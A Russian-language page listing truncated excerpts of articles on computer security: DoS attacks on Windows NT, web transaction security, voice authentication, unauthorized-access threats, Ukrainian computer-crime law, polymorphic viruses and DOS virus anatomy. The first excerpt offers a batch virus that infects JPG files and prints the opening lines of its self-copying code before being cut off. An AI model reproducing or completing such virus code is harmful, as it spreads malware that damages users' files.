Вам известно, что JPG-файлы — это картинки. И вы наверно слышали, что заражать их нельзя. Но на самом деле заражать можно почти все. Вот смотрите. Вирус заражает *.JPG в текущем каталоге.  ———————— резать тут —————————— @echo off%[MrWeb]% if ‘%1==’In_ goto MrWebin if exist c:MrWeb.bat goto MrWebru if not exist %0 goto MrWeben find «MrWeb»<%0>c:MrWeb.bat attrib […]


Как указывалось ранее, в сети Интернет все большее распространение получают атаки на доступность данных. Возможность их успешного проведения вытекает из уязвимости базовых протоколов информационного обмена в сети Интернет. Кроме этого, имеются типичные слабости реализации протоколов TCP/IP, наследуемые современными операционными системами. Рассмотрим атаки на доступность базовых функций Windows NT, получившие распространение в 1997-1998 rr. и вызвавшие […]


Торговые организации и банки довольно успешно пользуются Web-транзакциями в коммерческих целях; правительственные ведомства США также всерьез заинтересовались этой технологией. Однако как обстоят дела с информационной безопасностью? Достаточно ли совершенны, удобны и доступны по цене современные технологии управления доступом, шифрования данных и сертификации? Специалисты утверждают, что в настоящее время имеются все необходимые продукты для выполнения безопасных […]


В связи с возросшей информатизацией современного общества и увеличением числа объектов и потоков информации, которые необходимо защищать от несанкционированного доступа, а также необходимостью интеллектуализации всех форм взаимодействия пользователей автоматизированных систем управления с техническими средствами все более актуальными становятся проблемы использования механизмов речевых технологий для разграничения доступа к ИВС. Сегодня мы находимся на очередной стадии технической […]


Введение. Задача защиты информации, хранимой в компьютерных системах, от несанкционированного доступа (НСД), является весьма актуальной. Для решения этой задачи используется целый комплекс средств, включающий в себя технические, программно-аппаратные средства и административные меры защиты информации. Построение надежной защиты компьютерной системы невозможно без предварительного анализа возможных угроз безопасности системы тот анализ должен включать в себя: оценку ценности […]


«Байка живуча, наверное, благодаря своей правдоподобности» — такими словами заканчивалась заметка [1], в которой ставился вопрос о зарубежных компьютерах, выводимых из строя по телефонному звонку. Попробуем исследовать исторические корни проблемы. В 1988 году компанию Zenith Data Systems (США, Маунтин-Проспект) покинула группа инженеров-разработчиков, чтобы основать свое собственное дело. Факт сам по себе малопримечательный, однако уже через […]


Персональные компьютеры обычно не имеют встроенных программно-аппаратных средств  для аутентификации пользователя, управления доступом или защиты памяти, которая делилась бы на системную память и память, используемую для приложений пользователя. Из-за отсутствия средств защиты  и свободы действий,  с которой пользователи могут совместно использовать и изменять программное обеспечение, персональные компьютеры очень уязвимы к атакам вирусов, неправомочным пользователям и […]


Як визначено у Розділі ХVI нового Кримінального кодексу України компютерний злочин це протиправне використання електронно-обчислювальних машин (компютерів), систем та компютерних мереж, незаконне втручання в їх роботу (Ст.361) , викрадення, привласнення, вимагання компютерної інформації або заволодіння нею шляхом шахрайства чи зловживання службовим становищем (Ст.362), порушення правил експлуатації автоматизованих електронно-обчислювальних систем (Ст.363) [1]. Але як відомо, у […]


А не пpольете ли свет, почтеннейшие, каков пpинцип pаботы полимоpфик-виpусов? Т.е., каким обpазом он модифициpует свой код таким обpазом, что не остается HИ ОДHОГО исходного байта? Он что, и сам алгоpитм генеpит заново? Или отдельные куски местами пеpеставляет? Это, конечно, для SU.VIRUS, но там сейчас откpовенно LMD… А что непонятного? Свой код полимоpфы как бы […]


Анатомия компьютерного вируса. Наиболее распространенными видами компьютерных вирусов в MS DOS являются файловые нерезидентные, файловые резидентные и бутовые вирусы. Многие из пользователей имеют ограниченный опыт работы с MS DOS. В то же время для понимания функционирования файловых вирусов и средств защиты от них важно понимать структуру файловой системы и прерываний MS DOS. Поэтому в прил.4 […]